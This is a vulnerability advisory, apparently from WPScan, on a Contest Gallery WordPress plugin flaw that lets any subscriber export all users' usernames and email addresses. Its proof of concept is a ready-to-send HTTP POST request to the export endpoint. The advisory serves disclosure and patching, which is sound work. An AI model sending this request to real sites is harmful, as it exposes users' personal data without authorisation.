Contest Gallery < 13.1.0.7 – Subscriber+ Email Address Disclosure | Plugin Vulnerabilities

Description

The plugin does not have any proper access controls when exporting users from a gallery, which could allow any authenticated users (such as subscriber) to list all users from the blog, disclosing their username and email address

Proof of Concept

POST /wp-admin/admin.php?page=contest-gallery/index.php&users_management=true&option_id=1 HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Connection: close
Cookies; [subscriber+]
Upgrade-Insecure-Requests: 1

cg_create_user_data_csv_new_export=true&cg_create_user_data_csv=1

Affects Plugins

contest-gallery

Fixed in 13.1.0.7

Classification

Type

ACCESS CONTROLS

OWASP top 10

A5: Broken Access Control

CWE

CVSS

Miscellaneous

Original Researcher

WPScanTeam

Verified

Yes

WPVDB ID

71eb90f2-bad2-4de7-9335-02697aee9ffe

Timeline

Publicly Published

2021-11-01 (about 4 years ago)

Added

2021-11-01 (about 4 years ago)

Last Updated

2021-11-01 (about 4 years ago)

Other

Published

Title

Published

2024-06-20

Title

Solid Security < 9.3.2 - IP Address Spoofing to Denial of Service

Published

2023-10-16

Title

Awesome Support < 6.1.5 - Submitter+ Arbitrary File Deletion

Published

2021-05-26

Title

Simple 301 Redirects by BetterLinks - 2.0.0 – 2.0.3 - Arbitrary Plugin Activation

Published

2021-11-15

Title

Page/Post Content Shortcode <= 1.0 - Contributor+ Arbitrary Posts/Pages Access

Published

2024-09-06

Title

Cost Calculator Builder PRO < 3.2.2 - Unauthenticated Price Manipulation